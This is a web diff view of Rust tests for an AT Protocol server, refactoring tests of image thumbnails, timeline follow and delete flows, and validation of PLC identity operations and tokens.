    // Sanity-check the shape of a ProcessedImage: non-empty payload and mime
    // type, positive dimensions.
    let input = create_test_png(500, 500);
    let processed = ImageProcessor::new().process(&input, "image/png").unwrap();
    assert!(!processed.original.data.is_empty());
    assert!(!processed.original.mime_type.is_empty());
    assert!(processed.original.width > 0);
    assert!(processed.original.height > 0);
}
#[test]
fn test_only_feed_thumbnail_for_medium_images() {
    // 500px sits above the feed threshold but below the full threshold.
    let medium = create_test_png(500, 500);
    let processed = ImageProcessor::new().process(&medium, "image/png").unwrap();
    assert!(
        processed.thumbnail_feed.is_some(),
        "Should have feed thumbnail"
    );
    assert!(
        processed.thumbnail_full.is_none(),
        "Should NOT have full thumbnail for 500px image"
    );
}
#[test]
fn test_both_thumbnails_for_large_images() {
    // 2000px exceeds both thresholds, so both thumbnail variants are produced.
    let big = create_test_png(2000, 2000);
    let processed = ImageProcessor::new().process(&big, "image/png").unwrap();
    assert!(
        processed.thumbnail_feed.is_some(),
        "Should have feed thumbnail"
    );
    assert!(
        processed.thumbnail_full.is_some(),
        "Should have full thumbnail for 2000px image"
    );
}
#[test]
fn test_exact_threshold_boundary_feed() {
    // Feed thumbnails kick in strictly above THUMB_SIZE_FEED, not at it.
    let processor = ImageProcessor::new();
    let exactly_at = create_test_png(THUMB_SIZE_FEED, THUMB_SIZE_FEED);
    let outcome = processor.process(&exactly_at, "image/png").unwrap();
    assert!(
        outcome.thumbnail_feed.is_none(),
        "Exact threshold should not generate thumbnail"
    );
    let just_over = create_test_png(THUMB_SIZE_FEED + 1, THUMB_SIZE_FEED + 1);
    let outcome = processor.process(&just_over, "image/png").unwrap();
    assert!(
        outcome.thumbnail_feed.is_some(),
        "Above threshold should generate thumbnail"
    );
}
#[test]
fn test_exact_threshold_boundary_full() {
let processor = ImageProcessor::new();
let at_threshold = create_test_png(THUMB_SIZE_FULL, THUMB_SIZE_FULL);
let result = processor.process(&at_threshold, "image/png").unwrap();
assert!(
result.thumbnail_full.is_none(),
"Exact threshold should not generate thumbnail"
);
let above_threshold = create_test_png(THUMB_SIZE_FULL + 1, THUMB_SIZE_FULL + 1);
let result = processor.process(&above_threshold, "image/png").unwrap();
assert!(
result.thumbnail_full.is_some(),
"Above threshold should generate thumbnail"
);
assert!(result.original.width > 0 && result.original.height > 0);
}

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

View File

@@ -4,114 +4,7 @@ use chrono::Utc;
use common::*;
use helpers::*;
use reqwest::StatusCode;
use serde_json::{Value, json};
use std::time::Duration;
#[tokio::test]
async fn test_social_flow_lifecycle() {
    // End-to-end social flow: Bob follows Alice, sees her posts appear in his
    // timeline in reverse-chronological order, and sees one disappear after
    // Alice deletes it. Order of steps matters; the 1s sleeps give the
    // indexing pipeline time to catch up before each timeline read.
    let client = client();
    let (alice_did, alice_jwt) = setup_new_user("alice-social").await;
    let (bob_did, bob_jwt) = setup_new_user("bob-social").await;
    let (post1_uri, _) = create_post(&client, &alice_did, &alice_jwt, "Alice's first post!").await;
    create_follow(&client, &bob_did, &bob_jwt, &alice_did).await;
    tokio::time::sleep(Duration::from_secs(1)).await;
    // Read 1: Bob's timeline should contain exactly Alice's first post.
    let timeline_res_1 = client
        .get(format!(
            "{}/xrpc/app.bsky.feed.getTimeline",
            base_url().await
        ))
        .bearer_auth(&bob_jwt)
        .send()
        .await
        .expect("Failed to get timeline (1)");
    assert_eq!(
        timeline_res_1.status(),
        reqwest::StatusCode::OK,
        "Failed to get timeline (1)"
    );
    let timeline_body_1: Value = timeline_res_1.json().await.expect("Timeline (1) not JSON");
    let feed_1 = timeline_body_1["feed"].as_array().unwrap();
    assert_eq!(feed_1.len(), 1, "Timeline should have 1 post");
    assert_eq!(
        feed_1[0]["post"]["uri"], post1_uri,
        "Post URI mismatch in timeline (1)"
    );
    let (post2_uri, _) = create_post(
        &client,
        &alice_did,
        &alice_jwt,
        "Alice's second post, so exciting!",
    )
    .await;
    tokio::time::sleep(Duration::from_secs(1)).await;
    // Read 2: both posts present, newest first.
    let timeline_res_2 = client
        .get(format!(
            "{}/xrpc/app.bsky.feed.getTimeline",
            base_url().await
        ))
        .bearer_auth(&bob_jwt)
        .send()
        .await
        .expect("Failed to get timeline (2)");
    assert_eq!(
        timeline_res_2.status(),
        reqwest::StatusCode::OK,
        "Failed to get timeline (2)"
    );
    let timeline_body_2: Value = timeline_res_2.json().await.expect("Timeline (2) not JSON");
    let feed_2 = timeline_body_2["feed"].as_array().unwrap();
    assert_eq!(feed_2.len(), 2, "Timeline should have 2 posts");
    assert_eq!(
        feed_2[0]["post"]["uri"], post2_uri,
        "Post 2 should be first"
    );
    assert_eq!(
        feed_2[1]["post"]["uri"], post1_uri,
        "Post 1 should be second"
    );
    // Alice deletes post 1 via deleteRecord; the rkey is the last path segment
    // of the at:// URI.
    let delete_payload = json!({
        "repo": alice_did,
        "collection": "app.bsky.feed.post",
        "rkey": post1_uri.split('/').last().unwrap()
    });
    let delete_res = client
        .post(format!(
            "{}/xrpc/com.atproto.repo.deleteRecord",
            base_url().await
        ))
        .bearer_auth(&alice_jwt)
        .json(&delete_payload)
        .send()
        .await
        .expect("Failed to send delete request");
    assert_eq!(
        delete_res.status(),
        reqwest::StatusCode::OK,
        "Failed to delete record"
    );
    tokio::time::sleep(Duration::from_secs(1)).await;
    // Read 3: only post 2 should remain after the deletion propagates.
    let timeline_res_3 = client
        .get(format!(
            "{}/xrpc/app.bsky.feed.getTimeline",
            base_url().await
        ))
        .bearer_auth(&bob_jwt)
        .send()
        .await
        .expect("Failed to get timeline (3)");
    assert_eq!(
        timeline_res_3.status(),
        reqwest::StatusCode::OK,
        "Failed to get timeline (3)"
    );
    let timeline_body_3: Value = timeline_res_3.json().await.expect("Timeline (3) not JSON");
    let feed_3 = timeline_body_3["feed"].as_array().unwrap();
    assert_eq!(feed_3.len(), 1, "Timeline should have 1 post after delete");
    assert_eq!(
        feed_3[0]["post"]["uri"], post2_uri,
        "Only post 2 should remain"
    );
}
use serde_json::{json, Value};
#[tokio::test]
async fn test_like_lifecycle() {
@@ -277,97 +170,6 @@ async fn test_unfollow_lifecycle() {
);
}
#[tokio::test]
async fn test_timeline_after_unfollow() {
    // A followee's posts must vanish from the timeline once the follow record
    // is deleted.
    let client = client();
    let (alice_did, alice_jwt) = setup_new_user("alice-tl-unfollow").await;
    let (bob_did, bob_jwt) = setup_new_user("bob-tl-unfollow").await;
    let (follow_uri, _) = create_follow(&client, &bob_did, &bob_jwt, &alice_did).await;
    create_post(&client, &alice_did, &alice_jwt, "Post while following").await;
    tokio::time::sleep(Duration::from_secs(1)).await;

    let before = client
        .get(format!(
            "{}/xrpc/app.bsky.feed.getTimeline",
            base_url().await
        ))
        .bearer_auth(&bob_jwt)
        .send()
        .await
        .expect("Failed to get timeline");
    assert_eq!(before.status(), StatusCode::OK);
    let before_body: Value = before.json().await.unwrap();
    let before_feed = before_body["feed"].as_array().unwrap();
    assert_eq!(before_feed.len(), 1, "Should see 1 post from Alice");

    // Delete the follow record (the rkey is the last segment of its at:// URI).
    let unfollow_payload = json!({
        "repo": bob_did,
        "collection": "app.bsky.graph.follow",
        "rkey": follow_uri.split('/').last().unwrap()
    });
    client
        .post(format!(
            "{}/xrpc/com.atproto.repo.deleteRecord",
            base_url().await
        ))
        .bearer_auth(&bob_jwt)
        .json(&unfollow_payload)
        .send()
        .await
        .expect("Failed to unfollow");
    tokio::time::sleep(Duration::from_secs(1)).await;

    let after = client
        .get(format!(
            "{}/xrpc/app.bsky.feed.getTimeline",
            base_url().await
        ))
        .bearer_auth(&bob_jwt)
        .send()
        .await
        .expect("Failed to get timeline after unfollow");
    assert_eq!(after.status(), StatusCode::OK);
    let after_body: Value = after.json().await.unwrap();
    let after_feed = after_body["feed"].as_array().unwrap();
    assert_eq!(after_feed.len(), 0, "Should see 0 posts after unfollowing");
}
#[tokio::test]
async fn test_mutual_follow_lifecycle() {
    // Two users who follow each other should each see exactly the other's post.
    let client = client();
    let (alice_did, alice_jwt) = setup_new_user("alice-mutual").await;
    let (bob_did, bob_jwt) = setup_new_user("bob-mutual").await;
    create_follow(&client, &alice_did, &alice_jwt, &bob_did).await;
    create_follow(&client, &bob_did, &bob_jwt, &alice_did).await;
    create_post(&client, &alice_did, &alice_jwt, "Alice's post for mutual").await;
    create_post(&client, &bob_did, &bob_jwt, "Bob's post for mutual").await;
    tokio::time::sleep(Duration::from_secs(1)).await;

    let alice_res = client
        .get(format!(
            "{}/xrpc/app.bsky.feed.getTimeline",
            base_url().await
        ))
        .bearer_auth(&alice_jwt)
        .send()
        .await
        .expect("Failed to get Alice's timeline");
    assert_eq!(alice_res.status(), StatusCode::OK);
    let alice_tl: Value = alice_res.json().await.unwrap();
    let alice_feed = alice_tl["feed"].as_array().unwrap();
    assert_eq!(alice_feed.len(), 1, "Alice should see Bob's 1 post");

    let bob_res = client
        .get(format!(
            "{}/xrpc/app.bsky.feed.getTimeline",
            base_url().await
        ))
        .bearer_auth(&bob_jwt)
        .send()
        .await
        .expect("Failed to get Bob's timeline");
    assert_eq!(bob_res.status(), StatusCode::OK);
    let bob_tl: Value = bob_res.json().await.unwrap();
    let bob_feed = bob_tl["feed"].as_array().unwrap();
    assert_eq!(bob_feed.len(), 1, "Bob should see Alice's 1 post");
}
#[tokio::test]
async fn test_account_to_post_full_lifecycle() {
let client = client();

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

View File

@@ -5,454 +5,127 @@ use serde_json::json;
use sqlx::PgPool;
#[tokio::test]
async fn test_request_plc_operation_signature_requires_auth() {
async fn test_plc_operation_auth() {
let client = client();
let res = client
.post(format!(
"{}/xrpc/com.atproto.identity.requestPlcOperationSignature",
base_url().await
))
.send()
.await
.expect("Request failed");
let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await))
.send().await.unwrap();
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
}
#[tokio::test]
async fn test_request_plc_operation_signature_success() {
let client = client();
let (token, _did) = create_account_and_login(&client).await;
let res = client
.post(format!(
"{}/xrpc/com.atproto.identity.requestPlcOperationSignature",
base_url().await
))
.bearer_auth(&token)
.send()
.await
.expect("Request failed");
let res = client.post(format!("{}/xrpc/com.atproto.identity.signPlcOperation", base_url().await))
.json(&json!({})).send().await.unwrap();
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
.json(&json!({ "operation": {} })).send().await.unwrap();
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
let (token, _) = create_account_and_login(&client).await;
let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await))
.bearer_auth(&token).send().await.unwrap();
assert_eq!(res.status(), StatusCode::OK);
}
#[tokio::test]
async fn test_sign_plc_operation_requires_auth() {
async fn test_sign_plc_operation_validation() {
let client = client();
let res = client
.post(format!(
"{}/xrpc/com.atproto.identity.signPlcOperation",
base_url().await
))
.json(&json!({}))
.send()
.await
.expect("Request failed");
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
}
#[tokio::test]
async fn test_sign_plc_operation_requires_token() {
let client = client();
let (token, _did) = create_account_and_login(&client).await;
let res = client
.post(format!(
"{}/xrpc/com.atproto.identity.signPlcOperation",
base_url().await
))
.bearer_auth(&token)
.json(&json!({}))
.send()
.await
.expect("Request failed");
let (token, _) = create_account_and_login(&client).await;
let res = client.post(format!("{}/xrpc/com.atproto.identity.signPlcOperation", base_url().await))
.bearer_auth(&token).json(&json!({})).send().await.unwrap();
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
let body: serde_json::Value = res.json().await.unwrap();
assert_eq!(body["error"], "InvalidRequest");
}
#[tokio::test]
async fn test_sign_plc_operation_invalid_token() {
let client = client();
let (token, _did) = create_account_and_login(&client).await;
let res = client
.post(format!(
"{}/xrpc/com.atproto.identity.signPlcOperation",
base_url().await
))
.bearer_auth(&token)
.json(&json!({
"token": "invalid-token-12345"
}))
.send()
.await
.expect("Request failed");
let res = client.post(format!("{}/xrpc/com.atproto.identity.signPlcOperation", base_url().await))
.bearer_auth(&token).json(&json!({ "token": "invalid-token-12345" })).send().await.unwrap();
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
let body: serde_json::Value = res.json().await.unwrap();
assert!(body["error"] == "InvalidToken" || body["error"] == "ExpiredToken");
}
#[tokio::test]
async fn test_submit_plc_operation_requires_auth() {
let client = client();
let res = client
.post(format!(
"{}/xrpc/com.atproto.identity.submitPlcOperation",
base_url().await
))
.json(&json!({
"operation": {}
}))
.send()
.await
.expect("Request failed");
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
}
#[tokio::test]
async fn test_submit_plc_operation_invalid_operation() {
let client = client();
let (token, _did) = create_account_and_login(&client).await;
let res = client
.post(format!(
"{}/xrpc/com.atproto.identity.submitPlcOperation",
base_url().await
))
.bearer_auth(&token)
.json(&json!({
"operation": {
"type": "invalid_type"
}
}))
.send()
.await
.expect("Request failed");
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
let body: serde_json::Value = res.json().await.unwrap();
assert_eq!(body["error"], "InvalidRequest");
}
#[tokio::test]
async fn test_submit_plc_operation_missing_sig() {
let client = client();
let (token, _did) = create_account_and_login(&client).await;
let res = client
.post(format!(
"{}/xrpc/com.atproto.identity.submitPlcOperation",
base_url().await
))
.bearer_auth(&token)
.json(&json!({
"operation": {
"type": "plc_operation",
"rotationKeys": [],
"verificationMethods": {},
"alsoKnownAs": [],
"services": {},
"prev": null
}
}))
.send()
.await
.expect("Request failed");
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
let body: serde_json::Value = res.json().await.unwrap();
assert_eq!(body["error"], "InvalidRequest");
}
#[tokio::test]
async fn test_submit_plc_operation_wrong_service_endpoint() {
let client = client();
let (token, _did) = create_account_and_login(&client).await;
let res = client
.post(format!(
"{}/xrpc/com.atproto.identity.submitPlcOperation",
base_url().await
))
.bearer_auth(&token)
.json(&json!({
"operation": {
"type": "plc_operation",
"rotationKeys": ["did:key:z123"],
"verificationMethods": {"atproto": "did:key:z456"},
"alsoKnownAs": ["at://wrong.handle"],
"services": {
"atproto_pds": {
"type": "AtprotoPersonalDataServer",
"endpoint": "https://wrong.example.com"
}
},
"prev": null,
"sig": "fake_signature"
}
}))
.send()
.await
.expect("Request failed");
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
}
#[tokio::test]
async fn test_request_plc_operation_creates_token_in_db() {
async fn test_submit_plc_operation_validation() {
let client = client();
let (token, did) = create_account_and_login(&client).await;
let res = client
.post(format!(
"{}/xrpc/com.atproto.identity.requestPlcOperationSignature",
base_url().await
))
.bearer_auth(&token)
.send()
.await
.expect("Request failed");
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port()));
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
.bearer_auth(&token).json(&json!({ "operation": { "type": "invalid_type" } })).send().await.unwrap();
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
let body: serde_json::Value = res.json().await.unwrap();
assert_eq!(body["error"], "InvalidRequest");
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
.bearer_auth(&token).json(&json!({
"operation": { "type": "plc_operation", "rotationKeys": [], "verificationMethods": {},
"alsoKnownAs": [], "services": {}, "prev": null }
})).send().await.unwrap();
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
let handle = did.split(':').last().unwrap_or("user");
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
.bearer_auth(&token).json(&json!({
"operation": { "type": "plc_operation", "rotationKeys": ["did:key:z123"],
"verificationMethods": { "atproto": "did:key:z456" },
"alsoKnownAs": [format!("at://{}", handle)],
"services": { "atproto_pds": { "type": "AtprotoPersonalDataServer", "endpoint": "https://wrong.example.com" } },
"prev": null, "sig": "fake_signature" }
})).send().await.unwrap();
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
.bearer_auth(&token).json(&json!({
"operation": { "type": "plc_operation", "rotationKeys": ["did:key:zWrongRotationKey123"],
"verificationMethods": { "atproto": "did:key:zWrongVerificationKey456" },
"alsoKnownAs": [format!("at://{}", handle)],
"services": { "atproto_pds": { "type": "AtprotoPersonalDataServer", "endpoint": format!("https://{}", hostname) } },
"prev": null, "sig": "fake_signature" }
})).send().await.unwrap();
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
let body: serde_json::Value = res.json().await.unwrap();
assert_eq!(body["error"], "InvalidRequest");
assert!(body["message"].as_str().unwrap_or("").contains("signing key") || body["message"].as_str().unwrap_or("").contains("rotation"));
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
.bearer_auth(&token).json(&json!({
"operation": { "type": "plc_operation", "rotationKeys": ["did:key:z123"],
"verificationMethods": { "atproto": "did:key:z456" },
"alsoKnownAs": ["at://totally.wrong.handle"],
"services": { "atproto_pds": { "type": "AtprotoPersonalDataServer", "endpoint": format!("https://{}", hostname) } },
"prev": null, "sig": "fake_signature" }
})).send().await.unwrap();
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await))
.bearer_auth(&token).json(&json!({
"operation": { "type": "plc_operation", "rotationKeys": ["did:key:z123"],
"verificationMethods": { "atproto": "did:key:z456" },
"alsoKnownAs": ["at://user"],
"services": { "atproto_pds": { "type": "WrongServiceType", "endpoint": format!("https://{}", hostname) } },
"prev": null, "sig": "fake_signature" }
})).send().await.unwrap();
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
}
#[tokio::test]
async fn test_plc_token_lifecycle() {
let client = client();
let (token, did) = create_account_and_login(&client).await;
let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await))
.bearer_auth(&token).send().await.unwrap();
assert_eq!(res.status(), StatusCode::OK);
let db_url = get_db_connection_string().await;
let pool = PgPool::connect(&db_url).await.expect("DB connect failed");
let pool = PgPool::connect(&db_url).await.unwrap();
let row = sqlx::query!(
r#"
SELECT t.token, t.expires_at
FROM plc_operation_tokens t
JOIN users u ON t.user_id = u.id
WHERE u.did = $1
"#,
"SELECT t.token, t.expires_at FROM plc_operation_tokens t JOIN users u ON t.user_id = u.id WHERE u.did = $1",
did
)
.fetch_optional(&pool)
.await
.expect("Query failed");
).fetch_optional(&pool).await.unwrap();
assert!(row.is_some(), "PLC token should be created in database");
let row = row.unwrap();
assert!(
row.token.len() == 11,
"Token should be in format xxxxx-xxxxx"
);
assert_eq!(row.token.len(), 11, "Token should be in format xxxxx-xxxxx");
assert!(row.token.contains('-'), "Token should contain hyphen");
assert!(
row.expires_at > chrono::Utc::now(),
"Token should not be expired"
);
}
#[tokio::test]
async fn test_request_plc_operation_replaces_existing_token() {
let client = client();
let (token, did) = create_account_and_login(&client).await;
let res1 = client
.post(format!(
"{}/xrpc/com.atproto.identity.requestPlcOperationSignature",
base_url().await
))
.bearer_auth(&token)
.send()
.await
.expect("Request 1 failed");
assert_eq!(res1.status(), StatusCode::OK);
let db_url = get_db_connection_string().await;
let pool = PgPool::connect(&db_url).await.expect("DB connect failed");
let token1 = sqlx::query_scalar!(
r#"
SELECT t.token
FROM plc_operation_tokens t
JOIN users u ON t.user_id = u.id
WHERE u.did = $1
"#,
did
)
.fetch_one(&pool)
.await
.expect("Query failed");
let res2 = client
.post(format!(
"{}/xrpc/com.atproto.identity.requestPlcOperationSignature",
base_url().await
))
.bearer_auth(&token)
.send()
.await
.expect("Request 2 failed");
assert_eq!(res2.status(), StatusCode::OK);
assert!(row.expires_at > chrono::Utc::now(), "Token should not be expired");
let diff = row.expires_at - chrono::Utc::now();
assert!(diff.num_minutes() >= 9 && diff.num_minutes() <= 11, "Token should expire in ~10 minutes");
let token1 = row.token.clone();
let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await))
.bearer_auth(&token).send().await.unwrap();
assert_eq!(res.status(), StatusCode::OK);
let token2 = sqlx::query_scalar!(
r#"
SELECT t.token
FROM plc_operation_tokens t
JOIN users u ON t.user_id = u.id
WHERE u.did = $1
"#,
did
)
.fetch_one(&pool)
.await
.expect("Query failed");
"SELECT t.token FROM plc_operation_tokens t JOIN users u ON t.user_id = u.id WHERE u.did = $1", did
).fetch_one(&pool).await.unwrap();
assert_ne!(token1, token2, "Second request should generate a new token");
let count: i64 = sqlx::query_scalar!(
r#"
SELECT COUNT(*) as "count!"
FROM plc_operation_tokens t
JOIN users u ON t.user_id = u.id
WHERE u.did = $1
"#,
did
)
.fetch_one(&pool)
.await
.expect("Count query failed");
"SELECT COUNT(*) as \"count!\" FROM plc_operation_tokens t JOIN users u ON t.user_id = u.id WHERE u.did = $1", did
).fetch_one(&pool).await.unwrap();
assert_eq!(count, 1, "Should only have one token per user");
}
#[tokio::test]
async fn test_submit_plc_operation_wrong_verification_method() {
    // Submitting an operation whose rotation/verification keys do not match
    // the server-held keys must be rejected with InvalidRequest.
    let client = client();
    let (token, did) = create_account_and_login(&client).await;
    let hostname =
        std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port()));
    let handle = did.split(':').last().unwrap_or("user");
    let url = format!(
        "{}/xrpc/com.atproto.identity.submitPlcOperation",
        base_url().await
    );
    let payload = json!({
        "operation": {
            "type": "plc_operation",
            "rotationKeys": ["did:key:zWrongRotationKey123"],
            "verificationMethods": {"atproto": "did:key:zWrongVerificationKey456"},
            "alsoKnownAs": [format!("at://{}", handle)],
            "services": {
                "atproto_pds": {
                    "type": "AtprotoPersonalDataServer",
                    "endpoint": format!("https://{}", hostname)
                }
            },
            "prev": null,
            "sig": "fake_signature"
        }
    });
    let res = client
        .post(url)
        .bearer_auth(&token)
        .json(&payload)
        .send()
        .await
        .expect("Request failed");
    assert_eq!(res.status(), StatusCode::BAD_REQUEST);
    let body: serde_json::Value = res.json().await.unwrap();
    assert_eq!(body["error"], "InvalidRequest");
    let message = body["message"].as_str().unwrap_or("");
    assert!(
        message.contains("signing key") || message.contains("rotation"),
        "Error should mention key mismatch: {:?}",
        body
    );
}
#[tokio::test]
async fn test_submit_plc_operation_wrong_handle() {
    // An operation claiming an alsoKnownAs handle that does not belong to
    // the authenticated user must be rejected with InvalidRequest.
    let client = client();
    let (token, _did) = create_account_and_login(&client).await;
    let hostname =
        std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port()));
    let url = format!(
        "{}/xrpc/com.atproto.identity.submitPlcOperation",
        base_url().await
    );
    let payload = json!({
        "operation": {
            "type": "plc_operation",
            "rotationKeys": ["did:key:z123"],
            "verificationMethods": {"atproto": "did:key:z456"},
            "alsoKnownAs": ["at://totally.wrong.handle"],
            "services": {
                "atproto_pds": {
                    "type": "AtprotoPersonalDataServer",
                    "endpoint": format!("https://{}", hostname)
                }
            },
            "prev": null,
            "sig": "fake_signature"
        }
    });
    let res = client
        .post(url)
        .bearer_auth(&token)
        .json(&payload)
        .send()
        .await
        .expect("Request failed");
    assert_eq!(res.status(), StatusCode::BAD_REQUEST);
    let body: serde_json::Value = res.json().await.unwrap();
    assert_eq!(body["error"], "InvalidRequest");
}
#[tokio::test]
async fn test_submit_plc_operation_wrong_service_type() {
    // The atproto_pds service entry must declare the canonical
    // "AtprotoPersonalDataServer" type; anything else is InvalidRequest.
    let client = client();
    let (token, _did) = create_account_and_login(&client).await;
    let hostname =
        std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| format!("127.0.0.1:{}", app_port()));
    let url = format!(
        "{}/xrpc/com.atproto.identity.submitPlcOperation",
        base_url().await
    );
    let payload = json!({
        "operation": {
            "type": "plc_operation",
            "rotationKeys": ["did:key:z123"],
            "verificationMethods": {"atproto": "did:key:z456"},
            "alsoKnownAs": ["at://user"],
            "services": {
                "atproto_pds": {
                    "type": "WrongServiceType",
                    "endpoint": format!("https://{}", hostname)
                }
            },
            "prev": null,
            "sig": "fake_signature"
        }
    });
    let res = client
        .post(url)
        .bearer_auth(&token)
        .json(&payload)
        .send()
        .await
        .expect("Request failed");
    assert_eq!(res.status(), StatusCode::BAD_REQUEST);
    let body: serde_json::Value = res.json().await.unwrap();
    assert_eq!(body["error"], "InvalidRequest");
}
#[tokio::test]
async fn test_plc_token_expiry_format() {
    // A freshly minted PLC token should expire roughly 10 minutes out.
    let client = client();
    let (token, did) = create_account_and_login(&client).await;
    let res = client
        .post(format!(
            "{}/xrpc/com.atproto.identity.requestPlcOperationSignature",
            base_url().await
        ))
        .bearer_auth(&token)
        .send()
        .await
        .expect("Request failed");
    assert_eq!(res.status(), StatusCode::OK);
    let db_url = get_db_connection_string().await;
    let pool = PgPool::connect(&db_url).await.expect("DB connect failed");
    let row = sqlx::query!(
        r#"
        SELECT t.expires_at
        FROM plc_operation_tokens t
        JOIN users u ON t.user_id = u.id
        WHERE u.did = $1
        "#,
        did
    )
    .fetch_one(&pool)
    .await
    .expect("Query failed");
    // Allow one minute of slack on either side of the 10-minute TTL.
    let remaining = row.expires_at - chrono::Utc::now();
    let minutes = remaining.num_minutes();
    assert!(
        minutes >= 9,
        "Token should expire in ~10 minutes, got {} minutes",
        minutes
    );
    assert!(
        minutes <= 11,
        "Token should expire in ~10 minutes, got {} minutes",
        minutes
    );
}

View File

@@ -13,9 +13,7 @@ fn create_valid_operation() -> serde_json::Value {
let op = json!({
"type": "plc_operation",
"rotationKeys": [did_key.clone()],
"verificationMethods": {
"atproto": did_key.clone()
},
"verificationMethods": { "atproto": did_key.clone() },
"alsoKnownAs": ["at://test.handle"],
"services": {
"atproto_pds": {
@@ -29,444 +27,161 @@ fn create_valid_operation() -> serde_json::Value {
}
#[test]
fn test_plc_operation_basic_validation() {
    // Structural validation of PLC operations: a well-formed operation passes,
    // and each required field (type, sig, rotationKeys, verificationMethods,
    // alsoKnownAs, services) is individually enforced with a specific error.
    let op = create_valid_operation();
    assert!(validate_plc_operation(&op).is_ok());
    let missing_type = json!({ "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {}, "sig": "test" });
    assert!(matches!(validate_plc_operation(&missing_type), Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing type")));
    let invalid_type = json!({ "type": "invalid_type", "sig": "test" });
    assert!(matches!(validate_plc_operation(&invalid_type), Err(PlcError::InvalidResponse(msg)) if msg.contains("Invalid type")));
    let missing_sig = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {} });
    assert!(matches!(validate_plc_operation(&missing_sig), Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing sig")));
    let missing_rotation = json!({ "type": "plc_operation", "verificationMethods": {}, "alsoKnownAs": [], "services": {}, "sig": "test" });
    assert!(matches!(validate_plc_operation(&missing_rotation), Err(PlcError::InvalidResponse(msg)) if msg.contains("rotationKeys")));
    let missing_verification = json!({ "type": "plc_operation", "rotationKeys": [], "alsoKnownAs": [], "services": {}, "sig": "test" });
    assert!(matches!(validate_plc_operation(&missing_verification), Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods")));
    let missing_aka = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "services": {}, "sig": "test" });
    assert!(matches!(validate_plc_operation(&missing_aka), Err(PlcError::InvalidResponse(msg)) if msg.contains("alsoKnownAs")));
    let missing_services = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "sig": "test" });
    assert!(matches!(validate_plc_operation(&missing_services), Err(PlcError::InvalidResponse(msg)) if msg.contains("services")));
    // Non-object input is rejected outright.
    assert!(matches!(validate_plc_operation(&json!("not an object")), Err(PlcError::InvalidResponse(_))));
}
#[test]
fn test_validate_plc_operation_missing_type() {
    // An operation object with no `type` field must be rejected.
    let op_without_type = json!({
        "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {}, "sig": "test"
    });
    assert!(matches!(
        validate_plc_operation(&op_without_type),
        Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing type")
    ));
}
#[test]
fn test_validate_plc_operation_invalid_type() {
    // A `type` other than plc_operation/plc_tombstone must be rejected.
    let op_with_bad_type = json!({ "type": "invalid_type", "sig": "test" });
    assert!(matches!(
        validate_plc_operation(&op_with_bad_type),
        Err(PlcError::InvalidResponse(msg)) if msg.contains("Invalid type")
    ));
}
#[test]
fn test_validate_plc_operation_missing_sig() {
    // Every operation must carry a signature.
    let unsigned_op = json!({
        "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {}
    });
    assert!(matches!(
        validate_plc_operation(&unsigned_op),
        Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing sig")
    ));
}
#[test]
fn test_validate_plc_operation_missing_rotation_keys() {
    // rotationKeys is mandatory for plc_operation records.
    let op_without_rotation = json!({
        "type": "plc_operation", "verificationMethods": {}, "alsoKnownAs": [], "services": {}, "sig": "test"
    });
    assert!(matches!(
        validate_plc_operation(&op_without_rotation),
        Err(PlcError::InvalidResponse(msg)) if msg.contains("rotationKeys")
    ));
}
#[test]
fn test_validate_plc_operation_missing_verification_methods() {
    // verificationMethods is mandatory for plc_operation records.
    let op_without_verification = json!({
        "type": "plc_operation", "rotationKeys": [], "alsoKnownAs": [], "services": {}, "sig": "test"
    });
    assert!(matches!(
        validate_plc_operation(&op_without_verification),
        Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods")
    ));
}
#[test]
fn test_validate_plc_operation_missing_also_known_as() {
